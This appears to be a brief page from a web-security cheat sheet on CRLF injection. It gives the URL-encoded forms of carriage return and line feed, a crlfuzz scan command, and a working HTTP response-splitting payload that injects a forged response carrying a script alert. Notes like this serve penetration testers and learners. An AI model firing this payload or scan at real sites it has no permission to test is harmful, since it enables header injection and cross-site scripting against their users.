CRLF

Carriage Return = ASCII 13, \r, %0D
Line Feed = ASCII 10, \n, %0A

# https://github.com/dwisiswant0/crlfuzz
crlfuzz -u "http://example.com"

http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

gdoc_arrow_left_alt Cookie Based Attacks CSRF gdoc_arrow_right_alt